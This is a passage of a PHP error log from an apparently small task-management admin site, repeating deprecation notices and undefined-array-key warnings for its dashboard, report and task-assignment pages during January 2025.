/home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Jan-2025 18:08:17 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [13-Jan-2025 08:12:29 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Jan-2025 08:12:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [13-Jan-2025 08:12:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [13-Jan-2025 08:26:15 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Jan-2025 08:26:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [13-Jan-2025 08:26:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [13-Jan-2025 11:57:28 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Jan-2025 11:57:36 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [13-Jan-2025 11:57:36 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [13-Jan-2025 14:30:12 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Jan-2025 14:30:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [13-Jan-2025 14:30:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [13-Jan-2025 16:30:57 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Jan-2025 16:31:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [13-Jan-2025 16:31:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [13-Jan-2025 16:36:33 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Jan-2025 16:36:37 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [13-Jan-2025 16:36:37 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [13-Jan-2025 17:22:00 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Jan-2025 17:22:04 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [13-Jan-2025 17:22:04 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [14-Jan-2025 11:14:59 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [14-Jan-2025 11:15:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [14-Jan-2025 11:15:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [14-Jan-2025 11:49:11 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [14-Jan-2025 11:49:22 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [14-Jan-2025 11:49:22 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [14-Jan-2025 14:30:46 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [14-Jan-2025 14:30:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [14-Jan-2025 14:30:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [14-Jan-2025 16:31:59 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [14-Jan-2025 16:32:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [14-Jan-2025 16:32:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [15-Jan-2025 11:53:38 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [15-Jan-2025 11:53:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [15-Jan-2025 11:53:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [15-Jan-2025 12:51:49 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [15-Jan-2025 12:51:58 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [15-Jan-2025 12:51:58 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [15-Jan-2025 14:30:32 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [15-Jan-2025 14:30:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [15-Jan-2025 14:30:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [15-Jan-2025 15:46:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [15-Jan-2025 15:47:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [15-Jan-2025 15:47:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [15-Jan-2025 16:09:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [15-Jan-2025 16:09:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [15-Jan-2025 16:58:19 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Jan-2025 09:18:05 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Jan-2025 09:18:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [16-Jan-2025 09:18:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [16-Jan-2025 10:02:11 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Jan-2025 10:13:22 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Jan-2025 10:13:30 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [16-Jan-2025 10:13:30 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [16-Jan-2025 10:22:35 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [16-Jan-2025 10:22:35 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [16-Jan-2025 12:00:49 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Jan-2025 12:01:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [16-Jan-2025 12:01:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [16-Jan-2025 12:10:45 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Jan-2025 12:10:53 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [16-Jan-2025 12:10:53 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [16-Jan-2025 12:18:15 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [16-Jan-2025 12:18:15 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [16-Jan-2025 12:59:41 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [16-Jan-2025 12:59:41 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [16-Jan-2025 13:09:42 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [16-Jan-2025 13:09:42 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [16-Jan-2025 13:37:59 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Jan-2025 14:30:41 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Jan-2025 14:30:53 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [16-Jan-2025 14:30:53 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [16-Jan-2025 16:36:02 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Jan-2025 16:36:14 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [16-Jan-2025 16:36:14 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [16-Jan-2025 16:52:37 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Jan-2025 16:52:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [16-Jan-2025 16:52:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [16-Jan-2025 16:57:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [16-Jan-2025 16:57:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [16-Jan-2025 17:01:28 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [16-Jan-2025 17:01:28 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [16-Jan-2025 17:27:49 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Jan-2025 17:27:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [16-Jan-2025 17:27:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [17-Jan-2025 12:00:33 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Jan-2025 12:00:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [17-Jan-2025 12:00:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [17-Jan-2025 14:13:04 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Jan-2025 14:13:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [17-Jan-2025 14:13:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [17-Jan-2025 14:13:34 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Jan-2025 14:13:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [17-Jan-2025 14:13:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [17-Jan-2025 16:30:43 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Jan-2025 16:30:51 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [17-Jan-2025 16:30:51 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [17-Jan-2025 18:22:41 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Jan-2025 18:22:47 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [17-Jan-2025 18:22:47 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [20-Jan-2025 08:57:08 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Jan-2025 08:57:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [20-Jan-2025 08:57:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [20-Jan-2025 12:00:45 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Jan-2025 12:00:53 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [20-Jan-2025 12:00:53 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [20-Jan-2025 14:31:16 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Jan-2025 14:31:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [20-Jan-2025 14:31:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [20-Jan-2025 16:30:48 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Jan-2025 16:30:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [20-Jan-2025 16:30:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [21-Jan-2025 11:51:24 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [21-Jan-2025 11:51:28 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [21-Jan-2025 11:51:28 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [21-Jan-2025 12:00:28 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [21-Jan-2025 12:00:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [21-Jan-2025 12:00:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [21-Jan-2025 12:04:39 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [21-Jan-2025 14:32:42 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [21-Jan-2025 14:32:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [21-Jan-2025 14:32:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [21-Jan-2025 15:42:39 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [21-Jan-2025 16:32:20 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [21-Jan-2025 16:32:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [21-Jan-2025 16:32:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [22-Jan-2025 12:00:06 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [22-Jan-2025 12:00:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [22-Jan-2025 12:00:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [22-Jan-2025 14:30:44 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [22-Jan-2025 14:30:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [22-Jan-2025 14:30:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [22-Jan-2025 16:25:53 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [22-Jan-2025 16:25:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [22-Jan-2025 16:25:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [22-Jan-2025 16:26:23 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [22-Jan-2025 16:26:23 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [22-Jan-2025 16:27:43 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 23 [22-Jan-2025 16:27:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [22-Jan-2025 16:27:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Jan-2025 00:31:25 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Jan-2025 00:31:30 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Jan-2025 00:31:30 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Jan-2025 09:36:30 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Jan-2025 09:36:39 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Jan-2025 09:36:39 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Jan-2025 10:04:14 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [23-Jan-2025 10:04:14 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is 